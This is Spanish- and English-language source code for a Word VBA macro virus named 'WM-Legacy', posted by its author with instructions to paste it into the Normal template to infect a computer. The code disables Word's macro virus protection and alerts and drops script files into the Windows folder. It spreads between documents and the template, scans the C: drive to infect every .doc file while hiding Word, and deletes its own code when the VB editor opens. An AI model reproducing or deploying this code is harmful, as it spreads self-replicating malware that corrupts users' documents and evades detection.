WM-Legacy

Pues si seores , a continuacion les presento el primer virus de Word Residente en memoria de la
historia , tambien es un Hyper-Infector , porque en un corto periodo de tiempo esta belleza puede 
infectar todos los .doc del disco duro , utiliza una espectacular tecnica de stealth inventada por 
Flitnic , pero mejor dejo que el codigo hable por mi :

(Si quiere infectar un equipo , simplemente copie este codigo en la seccion ThisDocument de la
plantilla normal dot , y listo ;)


<------------------------------------------Cut Here!-------------------------------------------->


Sub AutoOpen()
With Options
.ConfirmConversions = 666 - 666: .VirusProtection = 666 - 666: End With
Application.ScreenUpdating = 666 - 666: Application.DisplayStatusBar = 666 - 666: Application.DisplayRecentFiles = 666 - 666
Application.DisplayAlerts = wdAlertsNone: Application.EnableCancelKey = wdCancelDisabled
i = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help", "Legacy")
If i = "" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help", "Legacy") = True
Open "C:\Windows\Io.Vxd.Vbs" For Output As #1
Print #1, "On Error Resume Next"
Print #1, "Set JP = CreateObject(" + Chr(34) + "Word.Application" + Chr(34) + ")"
Print #1, "JP.NormalTemplate.VBProject.VBComponents.AddFromfile (" + Chr(34) + "C:\Windows\Res.Sys" + Chr(34) + ")"
Print #1, "JP.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4"
Close #1
End If
DAI = True
PLI = True
Set pl = NormalTemplate.VBProject.VBComponents
Set da = ActiveDocument.VBProject.VBComponents
If pl.Item(1).codemodule.CountOfLines > 1 Then DAI = False
If da.Item(1).codemodule.CountOfLines > 1 Then PLI = False
If (DAI = False And PLI = True) Then
pl.Item(1).export ("C:\Windows\Res.Sys")
If ActiveDocument.ReadOnly = True Then GoTo suck
da.Item(1).codemodule.AddFromFile ("C:\Windows\Res.Sys")
da.Item(1).codemodule.deletelines 1, 4
da.Item(1).codemodule.replaceline 1, " Sub AutoClose"
da.Item(1).codemodule.replaceline 44, "private  Sub Legacy"
da.Item(1).codemodule.replaceline 52, "Private Sub Papa_Roach"
ActiveDocument.save
suck:
End If
If (PLI = False And DAI = True) Then
da.Item(1).export ("C:\Windows\Res.Sys")
pl.Item(1).codemodule.AddFromFile ("C:\Windows\Res.Sys")
pl.Item(1).codemodule.deletelines 1, 4
pl.Item(1).codemodule.replaceline 1, " Sub AutoOpen"
pl.Item(1).codemodule.replaceline 44, " Sub ViewVbCode"
pl.Item(1).codemodule.replaceline 52, " Sub AutoExit"
NormalTemplate.save
End If
End Sub
'Original Idea for this Stealth Is Found In A Virus From flitnic
Sub ViewVbCode()
NOL = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).codemodule.deletelines 1, NOL
For x = 1 To Documents.Count
Documents.Item(x).VBProject.VBComponents.Item(1).codemodule.deletelines 1, NOL
Next x
ShowVisualBasicEditor = True
End Sub
Sub AutoExit()
On Error Resume Next
B = 1
PEP = 1
Dim TOINF(300) As String
inf = 1
i = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help", "Legacy")
If i = "" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help", "Legacy") = True
With Application.FileSearch
.FileName = "C:\*.Doc"
.SearchSubFolders = True
.Execute msoSortByFileName, msoSortOrderDescending, True
xx = .FoundFiles.Count
Open "C:\Windows\FndFil32.Vxd" For Output As #1
Print #1, xx
For x = 1 To xx
Print #1, .FoundFiles.Item(x)
Next x
Close #1
End With
End If
Open "C:\Windows\FndFil32.Vxd" For Input As #1
Input #1, NAR
While Not EOF(1)
Input #1, pepe
TOINF(B) = pepe
B = B + 1
Wend
Close #1
For t = 1 To Tasks.Count
If Mid(Tasks(t).Name, 1, 14) = "Microsoft Word" Then
tt = t
Tasks(t).Visible = False
GoTo fuck2
End If
Next t
fuck2:
j = Int(VBA.timer)
jj = j + 200 'aprox 3-4 min
timer:
If Int(VBA.timer) > jj Then
infect:
Application.Documents.Open TOINF(inf), False
ActiveDocument.Close True, False
inf = inf + 1
PEP = PEP + 1
If PEP = 5 Then GoTo out
Open "C:\Windows\FndFil32.Vxd" For Output As #1
Print #1, NAR - inf
For g = 1 To (NAR - inf)
Print #1, TOINF(g + inf)
Next g
Close #1
GoTo fuck2
End If
GoTo timer
out:
End Sub
'First Even Word VBA virus that stays resident in memory , it needs a Pentium 3.2 Ghz to run not
'so suspicious but it Works ;)
'BioCoded By Vil Roach/Trenchcoat Legion - Kippelizing The World
'Special Thankx To : Kacimiro , Pepito , David L. Smith And Vicodin_es





